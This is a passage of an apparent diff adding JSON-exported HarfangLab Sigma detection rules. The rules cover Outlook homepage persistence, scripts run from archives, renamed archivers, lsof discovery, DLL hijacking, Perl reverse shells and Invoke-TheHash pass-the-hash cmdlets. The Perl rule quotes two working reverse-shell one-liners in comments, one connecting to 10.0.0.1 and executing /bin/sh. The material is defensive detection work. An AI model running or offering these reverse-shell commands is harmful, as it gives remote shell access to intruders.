homepage via the registry.\n Attackers can achieve persistence at Outlook boot via a custom crafted HTML file used as an homepage.\n It is recommended to check the new home page for suspicious content such as command execution and to analyze the process responsible for the registry modification.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md\n - https://attack.mitre.org/techniques/T1137/004/\ndate: 2021/06/24\nmodified: 2026/02/03\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1137.004\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.ConfigChange\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Office\\\\*\\Outlook\\WebView\\\\*\\URL'\n\n filter_empty:\n Details: '(Empty)'\n\n condition: selection and not 1 of filter_*\nlevel: medium\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "1c0971b5-dd3d-4802-967a-67f521f0ac2c", + "rule_name": "Microsoft Outlook Homepage Changed via Registry", + "rule_description": "Detects a change of the Microsoft Outlook homepage via the registry.\nAttackers can achieve persistence at Outlook boot via a custom crafted HTML file used as an homepage.\nIt is recommended to check the new home page for suspicious content such as command execution and to analyze the process responsible for the registry modification.\n", + "rule_creation_date": "2021-06-24", + "rule_modified_date": "2026-02-03", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.persistence" + ], + "rule_technique_tags": [ + "attack.t1137.004" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1c2f6b57-2c30-4918-afa5-ff6fff38e99d", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "moderate", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.085596Z", + "creation_date": "2026-03-23T11:45:34.085599Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.085603Z", + "rule_level": "high", + "rule_confidence": "moderate", + "rule_confidence_override": null, + "references": [ + "https://twitter.com/dez_/status/1620828523094228992", + "https://attack.mitre.org/techniques/T1204/002/" + ], + "name": "t1204_002_script_execution_from_archive.yml", + "content": "title: Script Executed from Archive\nid: 1c2f6b57-2c30-4918-afa5-ff6fff38e99d\ndescription: |\n Detects the execution of a script from an archive using wscript.exe or cscript.exe.\n This can be indicative of a user execution of a malicious script, directly from the archive browser.\n It is recommended to investigate the source of the archive file, its content, as well as search for malicious actions performed by the script itself.\nreferences:\n - https://twitter.com/dez_/status/1620828523094228992\n - https://attack.mitre.org/techniques/T1204/002/\ndate: 2023/09/05\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - attack.t1059\n - classification.Windows.Source.ProcessCreation\n - 
classification.Windows.Behavior.Phishing\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName:\n - 'wscript.exe'\n - 'cscript.exe'\n CommandLine|contains:\n - '?:\\Users\\\\*\\Temp\\RAR$'\n - '?:\\Users\\\\*\\Temp\\7z'\n - '?:\\Users\\\\*\\Temp\\Temp?_*.zip\\'\n - '?:\\Users\\\\*\\Temp\\\\*_*.zip.???\\'\n\n exclusion_ivanti:\n ParentImage:\n - '?:\\Program Files\\Ivanti\\Workspace Control\\pfwsmgr.exe'\n - '?:\\Program Files (x86)\\Ivanti\\Workspace Control\\pfwsmgr.exe'\n\n exclusion_landesk:\n ParentImage|endswith: '\\Microsoft\\Dynamics Ax*\\New\\Files\\VisualCPP*.exe'\n\n exclusion_octave:\n CommandLine: 'wscript.exe ?:\\Users\\\\*AppData\\Local\\Programs\\GNU Octave\\Octave-*\\octave.vbs * ?:\\Users\\\\*\\AppData\\Local\\Temp\\\\*_*.zip.???\\\\*'\n\n exclusion_ibm:\n CommandLine: '?:\\Windows\\System32\\WScript.exe ?:\\Users\\\\*\\AppData\\Local\\Temp\\\\*_IBMiAccess_*.zip.dc7\\Windows_Application\\install_*.js '\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "1c2f6b57-2c30-4918-afa5-ff6fff38e99d", + "rule_name": "Script Executed from Archive", + "rule_description": "Detects the execution of a script from an archive using wscript.exe or cscript.exe.\nThis can be indicative of a user execution of a malicious script, directly from the archive browser.\nIt is recommended to investigate the source of the archive file, its content, as well as search for malicious actions performed by the script itself.\n", + "rule_creation_date": "2023-09-05", + "rule_modified_date": "2025-04-14", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.execution" + ], + "rule_technique_tags": [ + "attack.t1059", + "attack.t1204.002" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": 
"0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1c812220-3709-4900-82e9-d3a5410edada", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "moderate", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.606332Z", + "creation_date": "2026-03-23T11:45:34.606336Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.606343Z", + "rule_level": "medium", + "rule_confidence": "moderate", + "rule_confidence_override": null, + "references": [ + "https://attack.mitre.org/techniques/T1560/001/" + ], + "name": "t1560_001_archiver_tool_renamed.yml", + "content": "title: Renamed Archiver Tool Executed\nid: 1c812220-3709-4900-82e9-d3a5410edada\ndescription: |\n Detects when a common archiver tool, such as 7Zip or WinRAR, has been renamed and executed.\n Renamed archivers have been observed in use by threat actors for exfiltrating data.\n It is recommended to investigate this behavior to determine if this archiver is not being used to compress sensitive data for exfiltration and to whitelist any recurring archive compressions such as backups.\nreferences:\n - https://attack.mitre.org/techniques/T1560/001/\ndate: 2020/12/15\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1560\n - attack.t1560.001\n - 
classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Collection\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_original:\n - Description: 'Command line RAR'\n - OriginalFileName:\n - '7z.exe'\n - '7za.exe'\n selection_goodname:\n - Image:\n - '*\\rar.exe'\n - '*\\unrar.exe'\n - '*\\7z.exe'\n - '*\\7za.exe'\n\n exclusion_unetbootin:\n Image|endswith: 'AppData\\Local\\Temp\\sevnz.exe'\n\n exclusion_known_fp:\n - ParentImage:\n - '?:\\Program Files (x86)\\Western Digital\\Discovery\\Current\\WD Discovery.exe'\n - '?:\\Program Files (x86)\\NCH Software\\ExpressZip\\expresszip.exe'\n - '*\\AppData\\Roaming\\NCH Software\\Program Files\\ExpressZip\\expresszip.exe'\n # C:\\Users\\XXX\\AppData\\Local\\Temp\\7zS8D4DFD71\\BlueStacksInstaller.exe\n # D:\\Utilisateurs\\XXX\\AppData\\Local\\Temp\\7zS033C881C\\BlueStacksInstaller.exe\n - '*\\AppData\\Local\\Temp\\7zs????????\\BlueStacksInstaller.exe'\n # C:\\Users\\XXX\\AppData\\Local\\Temp\\WDDiscoveryInstaller\\WD_Discovery_637623756875899969\\WD Discovery\\WD Discovery.exe\n - '*\\AppData\\Local\\Temp\\WDDiscoveryInstaller\\WD_Discovery_*\\WD Discovery\\WD Discovery.exe'\n - Image:\n - '?:\\Program Files (x86)\\BluestacksCN\\Engine\\7zr.exe'\n - '?:\\Program Files\\BlueStacks_nxt\\7zr.exe'\n - '?:\\Program Files (x86)\\Lenovo\\LockScreen\\7zwrap.exe'\n - '*\\AppData\\Local\\Temp\\WDDiscoveryInstaller\\WDDiscoveryInstaller.Resources.7za.exe'\n - '*\\NCH Software\\Components\\7zip\\7Zip.exe'\n - '*\\NCH Software\\Components\\7za32\\7Za32.exe'\n - '?:\\program files\\wondershare\\pdfelement*\\zip.exe'\n - '?:\\Program Files\\Wondershare\\Wondershare PDFelement pour Windows *\\zip.exe'\n - '?:\\Windows\\LTSvc\\_LTUPDATE\\LabtechUpdate.exe'\n\n condition: selection_original and not selection_goodname and not 1 of exclusion_*\nfalsepositives:\n - Legitimate use of archivers by an administrator or a third-party 
application.\nlevel: medium\nconfidence: moderate\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "1c812220-3709-4900-82e9-d3a5410edada", + "rule_name": "Renamed Archiver Tool Executed", + "rule_description": "Detects when a common archiver tool, such as 7Zip or WinRAR, has been renamed and executed.\nRenamed archivers have been observed in use by threat actors for exfiltrating data.\nIt is recommended to investigate this behavior to determine if this archiver is not being used to compress sensitive data for exfiltration and to whitelist any recurring archive compressions such as backups.\n", + "rule_creation_date": "2020-12-15", + "rule_modified_date": "2025-03-31", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.collection" + ], + "rule_technique_tags": [ + "attack.t1560", + "attack.t1560.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1cebc8c1-cd9a-4396-aa08-8d8c7cd6838b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "low", + "rule_effective_confidence": "weak", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:35.294983Z", + "creation_date": "2026-03-23T11:45:35.294987Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:35.295020Z", + "rule_level": "low", + "rule_confidence": "weak", + "rule_confidence_override": null, + "references": [ + "https://attack.mitre.org/techniques/T1033/" + ], + "name": "t1033_lsof_macos.yml", + "content": "title: Currently Open Files Listed via Lsof (macOS)\nid: 1cebc8c1-cd9a-4396-aa08-8d8c7cd6838b\ndescription: |\n Detects the execution of the lsof command.\n Attackers may use it during the discovery phase of an attack to retrieve the list of open files and the user associated with each of them.\n It is recommended to check for malicious behavior by the process launching lsof.\nreferences:\n - https://attack.mitre.org/techniques/T1033/\ndate: 2022/11/22\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1033\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/sbin/lsof'\n ParentImage|contains: '?'\n GrandparentImage|contains: '?'\n\n exclusion_parentimage:\n ParentImage:\n - '/Applications/GlobalProtect.app/Contents/Resources/PanGPS'\n - '/Applications/PyCharm CE.app/Contents/MacOS/pycharm'\n - '/Applications/PyCharm.app/Contents/MacOS/pycharm'\n - '/Applications/PyCharm Professional Edition.app/Contents/MacOS/pycharm'\n - '/Users/*/Applications/PyCharm Professional Edition.app/Contents/MacOS/pycharm'\n - '/Applications/Webex.app/Contents/MacOS/Webex'\n - '/Applications/WebStorm.app/Contents/MacOS/webstorm'\n - '/Users/*/Applications/WebStorm.app/Contents/MacOS/webstorm'\n - '/Applications/PhpStorm.app/Contents/MacOS/phpstorm'\n - '/Users/*/Library/Application Support/Steam/Steam.AppBundle/Steam/Contents/MacOS/steam_osx'\n - '/Applications/AWS VPN Client/AWS VPN Client.app/Contents/Resources/AWS VPN Client/Contents/MacOS/ACVCHelperTool'\n - '/Library/PrivilegedHelperTools/com.amazonaws.acvc.helper'\n - '/Applications/Docker.app/Contents/MacOS/com.docker.backend'\n - 
'/Applications/GitKraken.app/Contents/Frameworks/GitKraken Helper (Renderer).app/Contents/MacOS/GitKraken Helper (Renderer)'\n - '/Users/*/Applications/IntelliJ IDEA Ultimate.app/Contents/MacOS/idea'\n - '/applications/rider.app/contents/macos/rider'\n - '/Applications/GoLand.app/Contents/MacOS/goland'\n - '/Applications/IntelliJ IDEA CE.app/Contents/MacOS/idea'\n - '/Applications/RubyMine.app/Contents/MacOS/rubymine'\n - '/Users/*/Applications/PhpStorm.app/Contents/MacOS/phpstorm'\n - '/Users/*/Applications/Android Studio.app/Contents/MacOS/studio'\n - '/Applications/CleanMyMac_5.app/Contents/MacOS/CleanMyMac_5'\n - '/Applications/Android Studio Preview.app/Contents/MacOS/studio'\n - '/Applications/CleanMyMac X.app/Contents/MacOS/CleanMyMac X'\n - '/Users/*/Library/Application Support/WebEx Folder/Add-ons/Cisco WebEx Start.app/Contents/MacOS/Cisco WebEx Start'\n - '/Applications/SekoiaEndpointAgent.app/Contents/MacOS/SekoiaEndpointAgent'\n\n exclusion_grandparentimage:\n GrandparentImage:\n - '/Applications/Visual Studio Code - Insiders.app/Contents/Frameworks/Code - Insiders Helper.app/Contents/MacOS/Code - Insiders Helper'\n - '/Applications/VMware Fusion.app/Contents/Library/VMware Fusion Applications Menu.app/Contents/MacOS/VMware Fusion Applications Menu'\n - '/Library/Developer/CommandLineTools/Library/Frameworks/Python3.framework/Versions/*/Resources/Python.app/Contents/MacOS/Python'\n - '/private/var/folders/*/com.docker.install/in_progress/Docker.app/Contents/MacOS/install'\n - '/Applications/Docker.app/Contents/MacOS/install'\n\n # /usr/sbin/lsof -g -o -R /Users//Library/Application Support/WebEx Folder/MC_/Meeting Center.app\n exclusion_cisco_meeting_center:\n ParentImage|endswith: '/Cisco WebEx Start'\n CommandLine|contains|all:\n - '/usr/sbin/lsof -g -o -R /Users/'\n - 'Library/Application Support/WebEx Folder/MC_'\n - 'Meeting Center.app'\n\n # lsof /Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions//Google 
Chrome Framework\n exclusion_google_chrome_updater:\n CommandLine: 'lsof /Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/*/Google Chrome Framework'\n\n # lsof -OPln -p \n exclusion_vs_code:\n GrandparentImage:\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code - Helper (Renderer).app/Contents/MacOS/Code - Helper (Renderer)'\n - '/Applications/Visual Studio Code - Insiders.app/Contents/Frameworks/Code - Insiders Helper (Renderer).app/Contents/MacOS/Code - Insiders Helper (Renderer)'\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n CommandLine|startswith: 'lsof -OPln -p'\n\n exclusion_cwd:\n ParentCommandLine: '/bin/sh -c lsof -OPln * | grep cwd'\n\n exclusion_ampdevicesagent:\n CommandLine|startswith: '/usr/sbin/lsof -c AMPDevicesAgent'\n\n exclusion_edge:\n CommandLine: 'lsof /Applications/Microsoft Edge.app/Contents/Frameworks/Microsoft Edge Framework.framework/Versions/*/Microsoft Edge Framework'\n\n exclusion_ninjarmm:\n ParentImage: '/Applications/NinjaRMMAgent/programfiles/ninjarmm-macagent'\n\n exclusion_rider:\n ParentImage:\n - '/Users/*/Applications/Rider.app/Contents/MacOS/rider'\n - '/Applications/Rider 2.app/Contents/MacOS/rider'\n\n exclusion_inteliJ_idea:\n ParentImage|endswith: '/IntelliJ IDEA.app/Contents/MacOS/idea'\n # TODO : signed: 'true'\n\n exclusion_bluejeans:\n ParentImage: '/Applications/BlueJeans.app/Contents/Resources/daemon/BlueJeansHelper.app/Contents/MacOS/BlueJeansHelper'\n\n exclusion_activity_monitor:\n ParentImage: '/System/Applications/Utilities/Activity Monitor.app/Contents/MacOS/Activity Monitor'\n\n exclusion_android_studio:\n ParentImage: '/Applications/Android Studio.app/Contents/MacOS/studio'\n\n exclusion_erlang:\n Ancestors|startswith: '/bin/bash|/bin/bash|/opt/homebrew/Cellar/erlang/'\n\n # lsof -d 0-9999999 -lna -p \n exclusion_unknown:\n CommandLine|re: '^lsof -d 0-9999999 -lna -p \\d+$'\n 
ParentCommandLine: '/bin/sh -s unix:cmd'\n GrandparentCommandLine: '/bin/sh -s unix:cmd'\n\n exclusion_cleanmymac:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.macpaw.CleanMyMac*'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "1cebc8c1-cd9a-4396-aa08-8d8c7cd6838b", + "rule_name": "Currently Open Files Listed via Lsof (macOS)", + "rule_description": "Detects the execution of the lsof command.\nAttackers may use it during the discovery phase of an attack to retrieve the list of open files and the user associated with each of them.\nIt is recommended to check for malicious behavior by the process launching lsof.\n", + "rule_creation_date": "2022-11-22", + "rule_modified_date": "2026-02-11", + "rule_os": "macos", + "rule_status": null, + "rule_tactic_tags": [ + "attack.discovery" + ], + "rule_technique_tags": [ + "attack.t1033" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1cf5a84d-3577-4fed-aad6-e9be68687766", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.096335Z", + "creation_date": 
"2026-03-23T11:45:34.096338Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.096343Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_tcmsetup.yml", + "content": "title: DLL Hijacking via tcmsetup.exe\nid: 1cf5a84d-3577-4fed-aad6-e9be68687766\ndescription: |\n Detects potential Windows DLL Hijacking via tcmsetup.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'tcmsetup.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\TAPI32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n 
filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "1cf5a84d-3577-4fed-aad6-e9be68687766", + "rule_name": "DLL Hijacking via tcmsetup.exe", + "rule_description": "Detects potential Windows DLL Hijacking via tcmsetup.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1d0a5e73-d3a2-4ecd-9969-fe46c41edd38", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + 
"backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.618088Z", + "creation_date": "2026-03-23T11:45:34.618090Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.618094Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux", + "https://attack.mitre.org/techniques/T1059/004/" + ], + "name": "t1059_004_reverse_shell_perl_macos.yml", + "content": "title: Reverse Shell Executed via Perl (macOS)\nid: 1d0a5e73-d3a2-4ecd-9969-fe46c41edd38\ndescription: |\n Detects a suspicious command line related to a reverse shell execution via Perl.\n A reverse shell is a shell session that is initiated from a remote machine.\n Attackers often use reverse shell to bypass firewalls restrictions.\n It is recommended to check for malicious behavior by the process launching the command and its potential children.\nreferences:\n - https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux\n - https://attack.mitre.org/techniques/T1059/004/\ndate: 2022/11/14\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.004\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Script.perl\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection_base:\n Image: '/usr/bin/perl'\n\n # perl -e 'use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'\n selection_variant1:\n 
CommandLine|contains|all:\n - ' Socket'\n - 'socket('\n - 'connect('\n - 'open('\n - 'STDIN'\n - 'STDOUT'\n - 'exec('\n\n # perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"[IPADDR]:[PORT]\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'\n selection_variant2:\n CommandLine|contains|all:\n - 'perl'\n - 'IO::Socket::INET('\n - 'STDIN'\n - 'fdopen('\n - 'system'\n\n condition: selection_base and 1 of selection_variant*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "1d0a5e73-d3a2-4ecd-9969-fe46c41edd38", + "rule_name": "Reverse Shell Executed via Perl (macOS)", + "rule_description": "Detects a suspicious command line related to a reverse shell execution via Perl.\nA reverse shell is a shell session that is initiated from a remote machine.\nAttackers often use reverse shell to bypass firewalls restrictions.\nIt is recommended to check for malicious behavior by the process launching the command and its potential children.\n", + "rule_creation_date": "2022-11-14", + "rule_modified_date": "2025-03-31", + "rule_os": "macos", + "rule_status": null, + "rule_tactic_tags": [ + "attack.execution" + ], + "rule_technique_tags": [ + "attack.t1059.004" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1d290732-2a4c-43db-875e-699d2462cd5d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": 
null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.608016Z", + "creation_date": "2026-03-23T11:45:34.608020Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.608027Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/Kevin-Robertson/Invoke-TheHash", + "https://attack.mitre.org/techniques/T1059/001/", + "https://attack.mitre.org/techniques/T1550/002/" + ], + "name": "t1059_001_powershell_malicious_cmdlet_invoke_thehash.yml", + "content": "title: Malicious PowerShell Invoke-TheHash Commandlets Used\nid: 1d290732-2a4c-43db-875e-699d2462cd5d\ndescription: |\n Detects various malicious commandlets in PowerShell scripts, generally associated with the Invoke-TheHash module.\n Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB attacks through the .NET TCPClient.\n Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol.\n It is recommended to check other PowerShell command and the process behavior for suspicious activities.\nreferences:\n - https://github.com/Kevin-Robertson/Invoke-TheHash\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1550/002/\ndate: 2022/10/12\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.lateral_movement\n - attack.t1550.002\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.HackTool.Invoke-TheHash\n - classification.Windows.Behavior.AccountManipulation\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: powershell_event\n product: 
windows\ndetection:\n selection:\n PowershellCommand|contains:\n - 'Invoke-WMIExec'\n - 'Invoke-SMBExec'\n - 'Invoke-SMBEnum'\n - 'Invoke-SMBClient'\n - 'Invoke-TheHash'\n\n condition: selection\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "1d290732-2a4c-43db-875e-699d2462cd5d", + "rule_name": "Malicious PowerShell Invoke-TheHash Commandlets Used", + "rule_description": "Detects various malicious commandlets in PowerShell scripts, generally associated with the Invoke-TheHash module.\nInvoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB attacks through the .NET TCPClient.\nAuthentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol.\nIt is recommended to check other PowerShell command and the process behavior for suspicious activities.\n", + "rule_creation_date": "2022-10-12", + "rule_modified_date": "2025-04-14", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.lateral_movement" + ], + "rule_technique_tags": [ + "attack.t1059.001", + "attack.t1550.002" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1d329a59-c1ee-4f62-baac-4db01284ac5e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + 